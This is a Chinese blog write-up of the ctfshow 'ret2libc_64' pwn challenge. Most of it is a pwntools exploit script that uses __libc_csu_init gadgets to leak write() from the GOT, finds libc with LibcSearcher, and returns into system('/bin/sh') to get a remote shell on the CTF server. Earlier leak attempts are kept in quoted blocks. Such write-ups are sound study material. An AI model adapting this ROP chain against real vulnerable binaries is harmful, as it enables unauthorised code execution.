ctfshow 内部赛 pwn 签到题
在刷题的过程中不会做这道题,找了好久没找到wp,搞了几天,还怀疑题目出错了,结果一看有人最近(13天前)做出来了,又认真去搞。最终搞出来了,原来是csu。不想让后来人像我一样没有wp可以看,解出来马上就写了博客hhhh。
先放图片,2021.11.16该代码可行
这个我找了好久都没找到wp,但是我看到了一个人的博客,无意间发现他的题目似乎与这道题一样,于是尝试求解并解出,在这里感谢一下作者。这里的作者是偏有宸机,他那里有更好的解释:Ret2libc_64[csu及gets写bss段]。之前用常规的write函数泄露时ROP出现了问题,另外这里的博客与这里的博客的exp不知为何在我这里无法使用(可能题目更新了)。
代码如下(没用的注释删掉就好了hhhh)
#!/usr/bin/env python
# encoding: utf-8
# Exploit script for the ctfshow "ret2libc_64" challenge, exactly as pasted in
# the blog post.  Only the code outside the ''' ... ''' blocks runs; the quoted
# blocks are the author's earlier attempts kept for reference (the first and
# last use a pop-rdi / write leak, the live path uses the __libc_csu_init
# gadgets).
# NOTE(review): this is a Python 2 script (print statement on the
# `print "write:"` line, str and bytes mixed freely); it will not run
# unchanged under Python 3.
# NOTE(review): the fixed gadget addresses (0x4006B6 / 0x4006A0) and the
# 168-byte pad suggest the target is non-PIE with no stack canary -- the two
# mitigations that would defeat this particular chain; confirm with checksec.
'''
from pwn import*
from LibcSearcher import *
context.log_level = "debug"
r = remote('pwn.challenge.ctf.show',28098)
#r=process('./ret2libc_64')
elf = ELF('./ret2libc_64')
puts_plt=elf.plt['write']
puts_got=elf.got['gets']
main=elf.sym['main']
print(hex(main))
'''
# Gadget for the second stage below; presumably `pop rdi; ret` (per its name,
# same value as `rdi` in the last quoted attempt).
pop_rdi=0x0004006c3
# NOTE(review): unused in the live path -- only the commented-out
# stack-alignment variant of the final payload references it.
pop_ret=0x0004004a9
'''
rsi_r15 = 0x00000000004006c1
payload='a'*160+'a'*8+p64(pop_rdi)+p64(1)+p64(rsi_r15)+p64(puts_got)+p64(0)+p64(puts_plt)+p64(main)
r.recvuntil('now,Try Pwn Me?\n')
r.sendline(payload)
#r.recvuntil('now,Try Pwn Me?\n')
puts_addr = u64(r.recv(6).ljust(8, '\x00'))#ok
#puts_addr = u64(r.recv(7).ljust(8, '\x00'))#?
#puts_addr = u64(r.recvuntil('\n')[:-1].ljust(8,'\x00'))#?
#puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00'))#ok
'''
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
# NOTE(review): the local process handle is started and then immediately
# shadowed by the remote handle on the next line, so it is never closed.
sh = process('./ret2libc_64')
sh = remote('pwn.challenge.ctf.show',28098)
elf = ELF('./ret2libc_64')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#libc = ELF('../../tools/libc-database/db/libc6_2.23-0ubuntu10_amd64.so')
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
# The two __libc_csu_init gadgets used by csu(): gadgets1 is the pop sequence,
# gadgets2 the register moves + indirect call.  NOTE(review): the pop order is
# assumed from the standard gadget layout -- verify in this binary's
# disassembly.
gadgets1 = 0x00000000004006B6
gadgets2 = 0x00000000004006A0
write_got = elf.got['write']
main_addr = elf.symbols['main']
# Padding up to the saved return address: 0xa0 buffer + 8 saved rbp, matching
# the 'a'*0xa0+'a'*0x8 used in the quoted attempts.
offset = 'a'*168
# Build and send one ret2csu chain, ending with a return to ret_addr.
# NOTE(review): the body below lost its indentation in the paste -- as printed
# the def is a SyntaxError.  The lines down to sh.sendline(payload) belong
# inside it; whether sh.recvuntil(...) was inside or after the def cannot be
# recovered from the paste.
# NOTE(review): the arguments are pushed in the order r12, r15, r14, r13 (not
# r12..r15 as the names suggest); the call below relies on that ordering.
# Confirm against the gadget's pop order and consider renaming the parameters
# to match the slot each value actually lands in.
def csu(r12,r13,r14,r15,ret_addr):
payload = offset
payload += p64(gadgets1)
payload += "b"*8
payload += p64(0)
payload += p64(1)
payload += p64(r12)
payload += p64(r15)
payload += p64(r14)
payload += p64(r13)
payload += p64(gadgets2)
# Filler for the six registers popped again after gadgets2 falls through.
payload += "c"*56
payload += p64(ret_addr)
sh.sendline(payload)
sh.recvuntil("Pwn Me?\n")
# Stage 1: leak the resolved address of write() by calling write through its
# own GOT entry, then return to main for a second round.
csu(write_got,1,write_got,8,main_addr)
write_addr = u64(sh.recv(8))
print "write:",hex(write_addr)  # Python 2 print statement
#print(hex(puts_addr))
# Identify the remote libc from the leaked write offset and derive
# system / "/bin/sh" relative to the computed base.
libc=LibcSearcher('write',write_addr)#libcsearcher
libcbase=write_addr-libc.dump('write')
system_addr=libcbase+libc.dump('system')
bin_sh_addr=libcbase+libc.dump('str_bin_sh')
'''
libc_puts=0x0809c0
libc_sys=0x04f440
libc_bin=0x1b3e9a
offset = puts_addr - libc_puts#libcsearcher无法使用时
system_addr=offset+ libc_sys
bin_sh_addr=offset+ libc_bin
'''
# Stage 2: same 168-byte pad, then pop rdi <- "/bin/sh" and return into
# system().
payload='a'*160+'a'*8+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)
#payload='a'*160+'a'*8+p64(pop_ret)+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)#这个pop_ret是栈对齐的东西
sh.recvuntil('now,Try Pwn Me?\n')
sh.sendline(payload)
sh.interactive()
'''
from pwn import *
from LibcSearcher import *
io = remote('pwn.challenge.ctf.show',28092)
elf = ELF('./ret2libc_64')
context.log_level = 'debug'
rdi = 0x00000000004006c3
rsi_r15 = 0x00000000004006c1
main = 0x4005FD
payload = 'a'*0xa0+'a'*0x8 + p64(rdi) + p64(1)+p64(rsi_r15)+p64(elf.got['write'])+p64(0)+p64(elf.plt['write'])+p64(main)
io.sendline(payload)
leak = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc = LibcSearcher('write',leak)
offset = leak - libc.dump('write')
system = offset + libc.dump('system')
binsh = offset + libc.dump('str_bin_sh')
payload = 'a'*0xa0+'a'*0x8 + p64(rdi)+p64(binsh)+p64(system)
io.recvuntil('Me?\n')
io.sendline(payload)
io.interactive()
'''